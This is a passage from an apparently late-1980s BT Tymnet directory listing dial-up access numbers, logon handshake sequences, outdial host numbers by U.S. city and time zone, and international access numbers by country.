10672   LATROBE               PENNSYLVANIA    300/1200 412/537-0340   @PDN
11301   LEMOYNE/HARRISBURG    PENNSYLVANIA    300/1200 717/236-3274   @PDN
10672   MCKEESPORT            PENNSYLVANIA    300/1200 412/673-6200   @PDN
10672   NEW CASTLE            PENNSYLVANIA    300/1200 412/658-5982   @PDN
10672   NEW KENSINGTON        PENNSYLVANIA    300/1200 412/337-0510   @PDN
03526   NORRISTOWN            PENNSYLVANIA    300/1200 215/270-2970   @PDN
03526   PAOLI                 PENNSYLVANIA    300/1200 215/648-0010   @PDN
03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/923-7792   @PDN
03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/557-0659   @PDN
03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/545-7886   @PDN
03562   PHILADELPHIA          PENNSYLVANIA    300/1200 215/677-0321   @PDN
03562   PHILADELPHIA          PENNSYLVANIA    2400     215/625-0770   @PDN
10672   PITTSBURGH            PENNSYLVANIA    300/1200 412/281-8950   @PDN
10672   PITTSBURGH            PENNSYLVANIA    300/1200 412-687-4131   @PDN
10672   PITTSBURGH            PENNSYLVANIA    2400     412/261-9732   @PDN
10672   POTTSTOWN             PENNSYLVANIA    300/1200 215/327-8032   @PDN
03526   QUAKERTOWN            PENNSYLVANIA    300/1200 215/538-7032   @PDN
03526   READING               PENNSYLVANIA    300/1200 215/375-7570   @PDN
10672   ROCHESTER             PENNSYLVANIA    300/1200 412/728-9770   @PDN
03526   SCRANTON              PENNSYLVANIA    300/1200 717/348-1123   @PDN
03526   SCRANTON              PENNSYLVANIA    2400     717/341-1860   @PDN
10672   SHARON                PENNSYLVANIA    300/1200 412/342-1681   @PDN
03526   TULLYTOWN             PENNSYLVANIA    300/1200 215/547-3300   @PDN
10672   UNIONTOWN             PENNSYLVANIA    300/1200 412/437-5640   @PDN
03562   VALLEY FORGE          PENNSYLVANIA    300/1200 215/270-2970   @PDN
10672   WASHINGTON            PENNSYLVANIA    300/1200 412/223-9090   @PDN
03526   WAYNE                 PENNSYLVANIA    300/1200 215/341-9605   @PDN
10672   WILKINSBURG           PENNSYLVANIA    300/1200 412/241-1006   @PDN

06254   ALEXANDRIA            VIRGINIA        300/1200 703/683-6710   @PDN
06254   ARLINGTON             VIRGINIA        300/1200 703/524-8961   @PDN
06254   FAIRFAX               VIRGINIA        300/1200 703/385-1343   @PDN
06254   MCLEAN                VIRGINIA        300/1200 703/848-2941   @PDN


            (CONNECT MESSAGE)
            . _. _. _< _C _R _> _            (SYNCHRONIZES DATA SPEEDS)


            *. _T _  _< _C _R _> _           (TYMNET ADDRESS)

            131069             (ADDRESS CONFIRMATION - TYMNET DNIC)
            COM                (CONFIRMATION OF CALL SET-UP)


                                 BELL SOUTH

NODE    CITY                  STATE           DENSITY  ACCESS NUMBER MODEM
-----   --------------------  --------------  ------   ------------  -----
10207   ATLANTA               GEORGIA         300/1200 404/261-4633  @PLSK
10207   ATHENS                GEORGIA         300/1200 404/354-0614  @PLSK
10207   COLUMBUS              GEORGIA         300/1200 404/324-5771  @PLSK
10207   ROME                  GEORGIA         300/1200 404/234/7542  @PLSK


            (CONNECT MESSAGE)

            . _. _. _  _< _C _R _> _           (SYNCHRONIZES DATA SPEEDS)
                               (DOES NOT ECHO TO THE TERMINAL)

            1 _3 _1 _0 _6 _              (TYMNET ADDRESS)
                               (DOES NOT ECHO TO THE TERMINAL)



                                PACIFIC BELL

NODE    CITY                  STATE           DENSITY  ACCESS NUMBER  NTWK
-----   -------------------   --------------  ------   ------------   ----
03306   BERKELEY              CALIFORNIA      300/1200 415-548-2121   @PPS
06272   EL SEGUNDO            CALIFORNIA      300/1200 213-640-8548   @PPS
06272   FULLERTON             CALIFORNIA      300/1200 714-441-2777   @PPS
06272   INGLEWOOD             CALIFORNIA      300/1200 213-216-7667   @PPS
06272   LOS ANGELES(DOWNTOWN) CALIFORNIA      300/1200 213-687-3727   @PPS
06272   LOS ANGELES           CALIFORNIA      300/1200 213-480-1677   @PPS
03306   MOUNTAIN VIEW         CALIFORNIA      300/1200 415-960-3363   @PPS
03306   OAKLAND               CALIFORNIA      300/1200 415-893-9889   @PPS
03306   PALO ALTO             CALIFORNIA      300/1200 415-325-4666   @PPS
06272   PASADENA              CALIFORNIA      300/1200 818-356-0780   @PPS
03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-543-8275   @PPS
03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-626-5380   @PPS
03306   SAN FRANCISCO         CALIFORNIA      300/1200 415-362-2280   @PPS
03306   SAN JOSE              CALIFORNIA      300/1200 408-920-0888   @PPS
06272   SANTA ANNA            CALIFORNIA      300/1200 714-972-9844   @PPS
06272   VAN NUYS              CALIFORNIA      300/1200 818-780-1066   @PPS


            (CONNECT MESSAGE)

            . _. _. _< _C _R _             (SYNCHRONIZES DATA SPEEDS)>
                               (DOES NOT ECHO TO THE TERMINAL)

            ONLINE 1200
            WELCOME TO PPS:  415-XXX-XXXX
            1 _3 _1 _0 _6 _9 _             (TYMNET ADDRESS)
                               (DOES NOT ECHO UNTIL TYMNET RESPONDS)


                             SOUTHWESTERN BELL

NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
-----   --------------------  --------------  -------  ------------   -----
05443   KANSAS CITY           KANSAS          300/1200 316/225-9951   @MRLK
05443   HAYS                  KANSAS          300/1200 913/625-8100   @MRLK
05443   HUTCHINSON            KANSAS          300/1200 316/669-1052   @MRLK
05443   LAWRENCE              KANSAS          300/1200 913/841-5580   @MRLK
05443   MANHATTAN             KANSAS          300/1200 913/539-9291   @MRLK
05443   PARSONS               KANSAS          300/1200 316/421-0620   @MRLK
05443   SALINA                KANSAS          300/1200 913/825-4547   @MRLK
05443   TOPEKA                KANSAS          300/1200 913/235-1909   @MRLK
05443   WICHITA               KANSAS          300/1200 316/269-1996   @MRLK

04766   BRIDGETON/ST. LOUIS   MISSOURI        300/1200 314/622-0900   @MRLK
04766   ST. LOUIS             MISSOURI        300/1200 314/622-0900   @MRLK

06510   ADA                   OKLAHOMA        300/1200 405/436-0252   @MRLK
06510   ALTUS                 OKLAHOMA        300/1200 405/477-0321   @MRLK
06510   ALVA                  OKLAHOMA        300/1200 405/327-1441   @MRLK
06510   ARDMORE               OKLAHOMA        300/1200 405/223-8086   @MRLK
03167   BARTLESVILLE          OKLAHOMA        300/1200 918/336-6901   @MRLK
06510   CLINTON               OKLAHOMA        300/1200 405/323-8102   @MRLK
06510   DURANT                OKLAHOMA        300/1200 405/924-2680   @MRLK
06510   ENID                  OKLAHOMA        300/1200 405/242-8221   @MRLK
06510   LAWTON                OKLAHOMA        300/1200 405/248-8772   @MRLK
03167   MCALESTER             OKLAHOMA        300/1200 918/426-0900   @MRLK
03167   MIAMI                 OKLAHOMA        300/1200 918/540-1551   @MRLK
03167   MUSKOGEE              OKLAHOMA        300/1200 918/683-1114   @MRLK
06510   OKLAHOMA CITY         OKLAHOMA        300/1200 405/236-0660   @MRLK
06510   PONCA CITY            OKLAHOMA        300/1200 405/762-9926   @MRLK
03167   SALLISAW              OKLAHOMA        300/1200 918/775-7713   @MRLK
06510   SHAWNEE               OKLAHOMA        300/1200 405/273-0053   @MRLK
06510   STILLWATER            OKLAHOMA        300/1200 405/377-5500   @MRLK
03167   TULSA                 OKLAHOMA        300/1200 918/583-6606   @MRLK
06510   WOODWARD              OKLAHOMA        300/1200 405/256-9947   @MRLK


            (CONNECT MESSAGE)

            A _                  (YOUR TERMINAL IDENTIFIER)

            PLEASE LOG IN:
            .T < _C _R _> _            (USERNAME TO ACCESS TYMNET)



                            SOUTHERN NEW ENGLAND

NODE    CITY                  STATE           DENSITY  ACCESS NUMBERS NWRK
-----   -------------------   -----------     -------  -------------- -----
02727   BRIDGEPORT            CONNECTICUT     300/2400 203/366-6972   @CONNNET
02727   BRISTOL               CONNECTICUT     300/2400 203/589-5100   @CONNNET
02727   CANAAN                CONNECTICUT     300/2400 203/824-5103   @CONNNET
02727   CLINTON               CONNECTICUT     300/2400 203/669-4243   @CONNNET
02727   DANBURY               CONNECTICUT     300/2400 203/743-2906   @CONNNET
02727   DANIELSON             CONNECTICUT     300/2400 203/779-1880   @CONNNET
02727   HARTFORD/MIDDLETOWN   CONNECTICUT     300/2400 203/724-6219   @CONNNET
02727   MERIDEN               CONNECTICUT     300/2400 203/237-3460   @CONNNET
02727   NEW HAVEN             CONNECTICUT     300/2400 203/776-1142   @CONNNET
02727   NEW LONDON            CONNECTICUT     300/2400 203/443-0884   @CONNNET
02727   NEW MILFORD           CONNECTICUT     300/2400 203/355-0764   @CONNNET
02727   NORWALK               CONNECTICUT     300/2400 203/866-5305   @CONNNET
02727   OLD GREDDWICH         CONNNETICUT     300/2400 203/637-8872   @CONNNET
02727   OLD SAYBROOK          CONNECTICUT     300/2400 203/388-0778   @CONNNET
02727   SEYMOUR               CONNECTICUT     300/2400 203/881-1455   @CONNNET
02727   STAMFORD              CONNECTICUT     300/2400 203/324-9701   @CONNNET
02727   STORRS                CONNECTICUT     300/2400 203/429-4243   @CONNNET
02727   TORRINGTON            CONNECTICUT     300/2400 203/482-9849   @CONNNET
02727   WATERBURY             CONNECTICUT     300/2400 203/597-0064   @CONNNET
02727   WILLIMANTIC           CONNECTICUT     300/2400 203/456-4552   @CONNNET
02727   WINDSOR               CONNECTICUT     300/2400 203/688-9330   @CONNNET
02727   WINDSOR LCKS/ENFIELD  CONNECTICUT     300/2400 203/623-9804   @CONNNET



     H_ H_ <_ C_ R_>        (SYNCHRONIZES DATA SPEEDS)
                       (DOES NOT ECHO TO THE TERMINAL)

    ._ T_ <_ C_ R_>_         (MUST BE CAPITAL LETTERS)

     26-SEP-88   18:33          (DATA)
     031069                     (ADDRESS CONFIRMATION)
     COM                        (CONFIRMATION OF CALL SET-UP)



BT Tymnet's new  Asynchronous  Outdial  Service  enables you to establish an
asynchronous connection through TYMNET to destination computer equipment not
directly connected to  TYMNET.  You can connect to personal/micro computers,
receive-only  printers, and mini and  mainframe  computers which have modems
which will answer calls.  Calls are made  from the Outdial Host using modems
which offer Bell 103, Bell 212A, and V.22bis compatibility.

See your Sales Representative for information on this service.

      *             I  M  P  O  R  T  A  N  T  !            *
      *   Select the Outdial Host # which is located in     *
      *   (or closest to) the DESTINATION you are calling.  *

                         Outdial Host Numbers
                 Sorted by Time Zone, State, and City

  Eastern Time Zone -----------
        State/              Use Outdial   Outdial call made
          City                Host #       from Area Code
        ---------------     -----------   -----------------

          Bloomfield            9128            203
          Bridgeport            6472            203
          Hartford              9128            203
          New Haven             9126            203
          New London            7955            203
          North Haven           9126            203
          Somers                8071            203
          Stamford              9129            203
          Westport              7962            203

          Dover                 7789            302
          Georgetown            10800           302
          Newark                1784            302
          Willmington           1784            302

          Boca Raton            5656            407
          Clearwater            4637            813
          Cocoa                 3720            407
          Delray Beach          5656            407
          Fort Lauderdale       7123            305
          Fort Meyers           9453            813
          Fort Pierce           4701            407
          Jacksonville          5797            904
          Kissimmee             9900            407
          Longwood              7096            305
          Miami                 6582            305
          Naples                116             813
          Ocala                 7220            904
          Orlando               7096            305
          Ormond Beach          10699           904
          Pensacola             3193            904
          Port St. Lucie        9902            407
          Stuart                9902            407
          Tallahassee           3192            904
          Tampa                 5518            813
          Vero Beach            6181            407
          West Palm Beach       3326            407

          Athens                4829            404
          Atlanta               8795            404
          Columbus              4752            404
          Doraville             8795            404
          Marietta              8795            404
          Martinez              0433            404
          Norcross              8795            404
          Rome                  1386            404

          Bloomington           9323            812
          Elkhart               2444            219
          Evansville            3426            812
          Ft. Wayne             3423            219
          Gary                  2705            219
          Indianapolis          9349            317
          Kokomo                2646            317
          Marion                4632            317
          Muncie                5032            317
          South Bend            5129            219

          Frankfort             3718            502
          Lexington             9987            606
          Louisville            8678            502

          Portland              4217            207

          Annapolis             10587           301
          Baltimore             4600            301
          Cumberland            999             301
          Myersville            10832           301
          Rockville             552             301
          Salisbury             10209           301

          Bedford               7044            617
          Boston                8796            617
          Cambridge             8796            617
          Groton                10148           508
          Kingston              5936            617
          Leominster            10677           508
          Lowell                531             508
          Manchester            4001            508
          Marlborough           432             432
          Springfield           3948            413
          Taunton               3520            508
          Worcester             3456            508

          Ann Arbor             6438            313
          Battle Creek          10147           616
          Benton Harbor         4231            616
          Burton                894             313
          Detroit               8794            313
          Flint                 894             313
          Freeland              4766            517
          Grand Rapids          4017            616
          Kalamazoo             3195            616
          Lansing               9992            517
          Midland               4766            517
          Muskegon              4357            616
          Plymouth              4847            313
          Port Huron            4620            313
          Southfield            3948            313

        New Hampshire
          Manchester            4027            603
          Nashua                1347            603
          North Hampton         1696            603
          Peterborough          1554            603
          Portsmouth            6651            603

        New Jersey
          Atlantic City         5425            609
          Camden                8693            609
          Englewood Cliffs      6319            201
          Newark                7618            201
          Paterson              2312            201
          Pennsauken            8693            609
          Piscataway            3319            201
          Princeton             8920            609
          Red Bank              6334            201
          South Brunswick       8920            609
          Trenton               730             609
          Union City            4378            201
          Vineland              3847            609

        New York
          Albany                9192            518
          Binghampton           5312            607
          Buffalo               9194            716
          Centereach            582             516
          Hempstead             9193            516
          Kingston              8861            914
          Lake Grove            582             516
          Melville              8811            516
          New City              10615           914
          New York              1059            212
          Pittsford             6019            716
          Rochester             6019            716
          Syracuse              4710            315
          Utica                 1101            315
          White Plains          8571            914

        North Carolina
          Asheville             0271            704
          Charlotte             6793            704
          Durham                9986            919
          Fayetteville          1100            919
          Greensboro            2964            919
          Kannapolis            7821            704
          Rocky Mount           9324            919
          Winston Salem         8739            919

          Akron                 8740            216
          Canton                8160            216
          Cincinnati            1785            513
          Cleveland             4222            216
          Columbus              9347            614
          Dayton                9511            513
          Elyria                8859            216
          Mansfield             6022            419
          Toledo                1190            419
          Warren                3180            216
          Youngstown            4909            216

          Bethlehem             3432            215
          Coatesville           7057            215
          Erie                  3338            814
          Greensburg            4153            412
          Lancaster             7853            717
          Lemoyne               1707            717
          New Castle            7851            412
          Norristown            508             215
          Philadelphia          9581            215
          Pittsburgh            7408            412
          Scranton              1572            717
          State College         3765            814
          Wilkes-Barre          7941            717

        Rhode Island
          Providence            9130            401

        South Carolina
          Charleston            9907            803
          Columbia              9993            803
          Greenville            9074            803
          Myrtle Beach          9912            803

          Alexandria            2262            703
          Arlington             2262            703
          Fairfax               2262            703
          Hampton               8215            804
          Harrisonburg          10149           703
          Lynchburg             2839            804
          Midlothian            7339            804
          Newport News          8459            804
          Norfolk               6986            804
          Petersburg            1931            804
          Portsmouth            6986            804
          Richmond              413             804
          Roanoke               4026            703
          Williamsburg          4557            804

        West Virginia
          Charleston            3431            304
          Huntington            1430            304

  Central Time Zone -----------

        State/              Use Outdial   Outdial call made
          City                Host #       from Area Code
        ---------------     -----------   -----------------

          Birmingham            4101            205
          Florence              5641            205
          Gadsden               8287            205
          Huntsville            1258            205
          Mobile                8829            205
          Montgomery            3245            205
          Northport             2439            205
          Opelika               1751            205
          Tuscaloosa            2439            205

          Fayatteville          7374            501
          Fort Smith            1297            501
          Hot Springs           2725            501
          Little Rock           10690           501

          Bloomington           11496           309
          Bradley               4144            815
          Chicago               8257            312
          Danville              1119            217
          Decatur               8900            217
          East St. Louis        8910            618
          Freeport              2514            815
          Glen Ellyn            8944            312
          Lake Bluff            780             312
          Northfield            10945           708
          O'Fallon              3001            618
          Palatine              7005            708
          Peoria                3614            309
          Rockford              6048            815
          Rock Island           5296            309
          Springfield           5403            217
          Urbana                9753            217

          Ames                  1745            515
          Cedar Rapids          8755            319
          Des Moines            9854            515
          Dubuque               3275            319
          Iowa City             5290            319
          Marshalltown          5374            515
          Sioux City            2216            712
          Waterloo              5964            319

          Mission               8615            913
          Salina                3416            913
          Topeka                1672            913
          Wichita               8013            316

          Baton Rouge           6999            504
          Lafayette             8525            318
          Lake Charles          4233            318
          New Orleans           9694            504
          Shreveport            3539            314
          Slidell               10404           504

          Duluth                10933           218
          Minneapolis           3494            612
          Rochester             10597           507
          St. Paul              3494            612
          St. Cloud             8335            612

          Gulfport              1953            601
          Hattiesburg           1164            601
          Jackson               6301            601
          Pascagoula            8598            601
          Tupelo                9901            601
          Vicksburg             4405            601

          Bridgeton             8978            314
          Columbia              6017            314
          Independence          8615            913
          Joplin                1928            417
          Kansas City           8615            913
          Rolla                 6182            314
          St. Louis             8978            314

          Grand Island          6997            308
          Lincoln               9856            402
          Omaha                 2521            402

          Enid                  10816           405
          Oklahoma City         9165            405
          Tulsa                 6605            918

          Chattanooga           2937            615
          Clarkesville          5720            615
          Jackson               3175            901
          Knoxville             9985            615
          Memphis               1551            901
          Nashville             9141            615
          Oakridge              9683            615
          Sevierville           9114            615

          Abilene               6980            915
          Amarillo              8736            806
          Arlington             9337            817
          Austin                1306            512
          Baytown               7758            713
          Bryan                 4497            409
          Corpus Christi        424             512
          Dallas                2948            214
          Denton                5990            817
          El Paso               210             915
          Fort Worth            9337            817
          Houston               4562            713
          Killeen               9861            817
          Lubbock               4435            806
          McAllen               2565            512
          Midland               2326            915
          McKinney              8254            214
          San Antonio           9169            512
          Sherman               6248            214
          Temple                4687            817
          Texarkana             8871            214
          Victoria              10996           512
          Waco                  9859            817
          Wichita Falls         6862            817

          Appleton              8868            414
          Beloit                5314            608
          Brookfield            9167            414
          Green Bay             3421            414
          Madison               4200            608
          Milwaukee             9167            414
          Oshkosh               5966            414

  Mountain Time Zone ----------

        State/              Use Outdial   Outdial call made
          City                Host #       from Area Code
        ---------------     -----------   -----------------
          Flagstaff             6112            602
          Mesa                  9532            602
          Phoenix               9532            602
          Tucson                4751            602
          Yuma                  3530            602


          Aurora                2584            303
          Boulder               2584            303
          Colorado Springs      2660            719
          Denver                2584            303
          Fort Collins          8737            303
          Grand Junction        6115            303
          Greeley               7743            303

          Boise                 200             208
          Ceour D'Alene         10239           208
          Idaho Falls           3660            208
          Twin Falls            5151            208

          Great Falls           3740            406
          Billings              3504            406

        New Mexico
          Albuquerque           661             505
          Las Cruces            6630            505
          Santa Fe              4604            505

          Salt Lake City        534             801

          Casper                10537           307
          Laramie               1752            307

  Pacific Time Zone -----------

        State/              Use Outdial   Outdial call made
          City                Host #       from Area Code
        ---------------     -----------   -----------------

          Alhambra              9204            818
          Anaheim               9184            714
          Bakersfield           3664            805
          Burbank               2841            818
          Cathedral City        7859            619
          Chico                 7801            916
          Colton                6294            714
          Diamond Bar           4309            714
          El Segundo            9203            203
          Fairfield             4952            707
          Fremont               7399            415
          Fresno                3996            209
          Inglewood             3173            213
          Lancaster             5991            805
          Long Beach            9205            213
          Los Alamos            6116            805
          Merced                8269            209
          Modesto               2120            209
          Monterey              5379            408
          Moorpark              5134            805
          Napa                  1911            707
          Newport Beach         9184            714
          Oakland               8963            415
          Palm Springs          7859            619
          Pasadena              9204            818
          Pleasanton            9202            415
          Port Hueneme          4112            805
          Poway                 5416            619
          Redwood City          9182            415
          Riverside             6294            714
          Sacramento            9179            916
          Salinas               3655            408
          San Clemente          4447            714
          San Diego             9183            619
          San Francisco         9533            415
          San Jose              6450            408
          San Luis Obispo       2979            805
          San Rafael            8094            415
          Santa Barbara         6295            805
          Santa Cruz            3182            408
          Santa Maria           6116            805
          Santa Rosa            4111            707
          Sherman Oaks          9206            818
          So. San Francisco     3486            415
          Upland                5970            714
          Vallejo               3830            707
          Vernon                3173            213
          Visalia               3598            209
          Vista                 4304            619
          Walnut Creek          9202            415

          Boulder City          342             702
          Carson City           2140            702
          Las Vegas             342             702
          Reno                  2140            702

          Corvallis             8603            503
          Eugene                9857            503
          Portland              9164            503
          Salem                 3174            503

          Auburn                1827            206
          Bellevue              9170            206
          Bellingham            2745            206
          Bremerton             773             206
          Longview              2944            206
          Port Angeles          6113            206
          Pullman               5298            509
          Richland              2116            509
          Seattle               9170            206
          Spokane               159             206
          Tacoma                906             206
          Vancouver             5447            206
          Yakima                8931            509


The TYMNET Public Network is accessible from most countries
throughout the world. In many cities within these countries TYMNET
may be accessed with a local phone call.  These countries are listed
below for your convenience.

TYMNET can also be accessed from most other countries via TYMUSA or
Telex.  For more complete information about access to TYMNET from
international locations, or about access to international locations
from TYMNET, consult the Information System or your local BT Tymnet
representative or call Customer Information Help Desk at
800/336-0149 or 703/442-0145.


BT Tymnet, in its continuing effort to provide convenient data
communications solutions for you, now offers direct dial-up access
from international locations.

Users located in the countries listed can access TYMNET, directly,
using terminals and/or PCs operating asynchronously.

                 International Service Requirements

             Speed (bps):        Modem Type:
             300                 CCITT V.21
             300B                Bell 103/113 compatible
             1200                CCITT V.22
             1200B               Bell 212A compatible
             2400                CCITT V.22 bis compatible
             9600                CCITT V.32 compliant

        - Trispeed denotes 300B, 1200B, or 2400 capability
        - Services fully compliant with BT Tymnet certified modems
        - V.42 compatible/MNP Level 2 - 4
        - Density classifications (CanH, CanL, 1, 2, 3, 4, 5, E1,

          E2, Pacific, *) signify a rate structure different from
          standard domestic rates.
          Please consult the Information System or your local
          BT Tymnet representative for details.

Access procedures for direct access are identical to domestic

access procedures.  Please consult the pamphlet "How to Use TYMNET"
(Publications #C-001) for more details.


               Countries With Direct TYMNET Access

Country, Province                  Access
City                   Density     Number          Comments
Melbourne              Pacific     (3)416-2146     300/1200/2400/mnp
Sydney                 Pacific     (2)290-3400     300/1200/2400/mnp

For BT Tymnet's Australian Support Center, call:  008-032064

Brussels               E1          (2)640-0215     300
                      E1          (2)647-1150     1200/2400
Mons                   E1          (65)36-0051     1200/2400

Note: When dialing inter-country to Belgium, all phone numbers

      are preceded by dialing (32).


Copenhagen             E2          31-18-63-33     300/1200/2400/mnp

Note: When dialing inter-country to Copenhagen, the phone number
      is preceded by dialing (45).

Paris                  E1          (1) 46-02-57-50 300/1200/2400
                      E1          (1) 46-02-55-00 1200/2400/mnp
                      E1          (1) 47-71-91-33 1200
                      E1          (1) 46-02-70-03 300/1200/2400/mnp
Lyon                   E1          (7) 89-30-17-3  300/1200/2400/mnp

Note: When dialing inter-country to France, all phone numbers
      are preceded by dialing (33).   For BT Tymnet's support center
      in Paris call: 1-49-11-21-21

Milan                  E2          (2) 26-41-24-50 1200/2400

Note: When dialing inter-country to Italy, the phone number is
      preceded by (39).

Akita                  *           (188) 655735    300B
Akita                  *           (188) 655733    1200B
Akita                  *           (188) 655734    1200B/2400
Atsugi                 *           (462) 215331    300B
Atsugi                 *           (462) 210404    1200B/2400
Fukui                  *           (776) 343308    300B
Fukui                  *           (776) 358840    1200B/2400
Fukuoka                *           (92) 474-7076   300B
Fukuoka                *           (92) 474-7196   1200B/2400
Hamamatsu              *           (534) 567355    300B
Hamanatsu              *           (534) 567231    1200B/2400
Hiroshima              *           (82) 241-6857   300B
Hiroshima              *           (82) 243-9270   1200B/2400
Kagoshima              *           (992) 228598    300B
Kagoshima              *           (992) 228954    1200B
Kagoshima              *           (992) 229154    1200B/2400
Kanazawa               *           (762) 242351    300B
Kanazawa               *           (762) 242341    1200B/2400
Kohbe                  *           (78) 242-1097   300B
Kohbe                  *           (78) 242-1115   1200B/2400
Kumamoto               *           (96) 355-5233   300B
Kumamoto               *           (96) 354-3065   1200B/2400
Kyoto                  *           (75) 431-6205   300B
Kyoto                  *           (75) 431-6203   1200B/2400
Matsuyama              *           (899) 322975    300B
Matsuyama              *           (899) 324207    1200B/2400
Mito                   *           (292) 241675    300B
Mito                   *           (292) 244213    1200B/2400
Morioka                *           (196) 548513    300B
Morioka                *           (196) 547315    1200B/2400
Nagagsaki              *           (958) 286088    300B
Nagagsaki              *           (958) 286077    1200B/2400
Nagoya                 *           (52) 204-2275   300B
Nagoya                 *           (52) 204-1466   1200B/2400
Naha                   *           (988) 614002    300B
Naha                   *           (988) 613414    1200B/2400
Niigata                *           (25) 241-5409   300B
Niigata                *           (25) 241-5410   1200B/2400
Okayama                *           (862) 326760    300B
Okayama                *           (862) 314993    1200B/2400
Osaka                  *           (6) 271-9028    300B
Osaka                  *           (6) 271-9029    1200B
Osaka                  *           (6) 271-6876    1200B/2400
Sapporo                *           (11) 281-4343   300B
Sapporo                *           (11) 281-4421   1200B/2400
Sendai                 *           (22) 231-5741   300B
Sendai                 *           (22) 231-5355   1200B/2400
Shizuoka               *           (542) 843393    300B
Shizuoka               *           (542) 843398    1200B/2400
Takamatsu              *           (878) 230502    300B
Takamatsu              *           (878) 230501    1200B/2400
Tokyo                  *           (3) 3555-9525   300B
Tokyo                  *           (3) 3555-9526   1200B
Tokyo                  *           (3) 3555-9696   2400
Toyama                 *           (764) 417578    300B
Toyama                 *           (764) 417769    1200B/2400
Tuchiura               *           (298) 555082    300B
Tuchiura               *           (298) 556121    1200B/2400
Urawa                  *           (488) 339341    1200B/2400
Yokohama               *           (45) 453-7757   300B
Yokohama               *           (45) 453-7637   1200B/2400

      For NIS customer service in Japan 24 hours a day call:
                        (3) 551-6220

Note: When dialing inter-country to Japan, all phone numbers are
      preceded by dialing (81).


Alkmaar                E1          (72) 155190     300/1200/2400/mnp
Amsterdam              E1          (20) 6610094    300/1200/1200-75
Eindhoven              E1          (4902) 45530    300/1200/2400/mnp
The Hague              E1          (70) 3814641    1200
                      E1          (70) 3475032    300/1200/2400/mnp
                                  (70) 3818448    4800/9600/mnp
Rotterdam              E1          (10)4532002     300/1200/1200-75

Note: When dialing inter-country to the Netherlands, all phone
      numbers are preceded by dialing (31).  For BT Tymnet's support
      center in the Netherlands call: (70) 3820044

Stockholm              E2          (8) 29-4782     300/1200/2400/mnp

Note: When dialing inter-country to the Stockholm, the phone
      number is preceded by dialing (46).  For BT Tymnet's support
      center in Sweden call: (8) 98-8140

Geneva                 E1          (22) 782-9329   300/1200/2400
Zurich                 E1          (1) 730-9673    1200/2400

Note: When dialing inter-country to Switzerland, all phone
      numbers are preceded by dialing (41). For BT Tymnet's support
      center in Switzerland call: (22) 782-5040

Belfast                E1         (232)  234467
Birmingham             E1         (21) 632 6636
Bristol                E1         (272)  255392
Cambridge              E1         (223)  845860
Edinburgh              E1         (31) 313 2172
Leeds                  E1         (532)  341838
London                 E1         (81) 566 7260
London                 E1         (71) 489 8571

Note: The preceeding United Kingdom access numbers are scheduled to be
     available early August 1990.  Please consult GNS customer support
     at 703/442-0145 or BT Tymnet's support center in London at (582)
     482 592 for more information.

Note: When dialing inter-country to the United Kingdom, all
      phone numbers are preceded by dialing (44).  The above access
      numbers will support 300-2400 V22 bis and MNP 4.

Cologne                E1          (221)210196     300/1200/2400
Frankfurt              E1          (69)666-8131    1200
                      E1          (69)668011      300
                      E1          (69)666-4021    300/1200
Munich                 E1          (89)350-7682    300/1200/2400

Note: When dialing inter-country to West Germany, all phone
      numbers are preceded by dialing (49).  For BT Tymnet's
      support center in West Germany call: (21) 159-6314


Quick, easy access from around the world; a universal, simple and
familiar log-on procedure (see below).

All communication charges are billed to the host in the USA by BT

TYMUSA is offered on BT Tymnet in country nodes, PTT's nodes using
TYMNET technology (via a `T2' Gateway) and PTT's nodes using non-
TYMNET technology (via a X.75 Gateway).

On dial-access location using non-TYMNET technology, the service is
referred to as TYMLINK.  Log-on may vary to that of TYMUSA; however,
all other features are the same.  Variations in log-on are highlighted.

TYMUSA is offered in all BT Tymnet GNS countries at charge rate Band 1.

                     TYMUSA ACCESS COUNTRIES

City                  Band         Number          Comments
All Cities             3           809/462-0210    300B/1200B

Note: When dialing inter-country to Antigua, the phone number is
      preceded by dialing (1).  (If in USA/Canada, use above only.)

Buenos Aires           2           (1) 40-01-91    300
                      2           (1) 40-01-92    300
                      2           (1) 40-01-93    300
                      2           (1) 40-01-94    300
                      2           (1) 40-01-95    300
                      2           (1) 40-01-96    300
                      2           (1) 40-01-97    300
                      2           (1) 40-01-98    300
                      2           (1) 40-01-99    300

Note: When dialing inter-country to Argentina, all phone numbers
      are preceded by dialing (54).

City                  Band         Number          Comments
Vienna                 2           (222) 50124     300
Vienna                 2           (222) 50143     1200/2400
Outside Vienna         2           229015          1200/2400
                      2           229016          300/1200
                      2           229017          1200/2400

Note : Log-on "..." (cr) then TYMUSA log-on procedure. For additional
       log-on information please refer to BT Tymnet's on-line
       information service.

Note: When dialing inter-country to Argentina, all phone numbers
      are preceded by dialing (43).

All Cities             3           809/323-7799    300B/1200B/2400

Note: When dialing inter-country to the Bahamas, the phone number
      is preceded by dialing (1). (If in USA/Canada, use above only.)

All Cities             3           242525          300
                      3           245361          1200

Note: When dialing inter-country to Bahrain, all phone numbers
      are preceded by dialing (973).

All Cities             3           809/426-7760    300B/1200B

Note: When dialing inter-country to Barbardos, the phone number
      is preceded by dialing (1). (If in USA/Canada, use above only.)

All Cities             2           809/292-4327    300B/1200B

Note: When dialing inter-country to Bermuda, the phone number
      is preceded by dialing (1). (If in USA/Canada, use above only.)

All Cities             3           809/949-7100    300B/1200B

Note: When dialing inter-country to the Cayman Islands, the phone
      number is preceded by dialing (1). (If in USA/Canada, use
      above only.)

All Cities             3           809/685-6155    300B/1200B

Note: Use domestic log-on procedure.

Note: When dialing inter-country to the Dominican Republic, the
      phone number is preceded by dialing (1). (If in USA/Canada,
      use above only.)

Agana Heights          *           477-2222        300/1200

Note: When dialing inter-country to Guam, the phone number is
      preceded by dialing (671).

Guatemala City         2           (2) 345-599     300B
                      2           (2) 345-999     1200B

Note: When dialing inter-country to Guatemala, all phone numbers
      are preceded by dialing (502).


All Cities             2           320-544         300B/1200B

Note: When dialing inter-country to Honduras, the phone number
      is preceded by dialing (504).

Hong Kong              2           865-7414        300B/1200B/2400

Note: Use domestic log-on procedure.

Note: When dialing inter-country to Hong Kong, the phone number
      is preceded by dialing (852).

Afula                  3           (6) 596658      300B/1200B/2400
Ashdod                 3           (8) 542999      300B/1200B/2400
Bezeq                  3           (57) 36029      300B/1200B/2400
Eilat                  3           (59) 75147      300B/1200B/2400
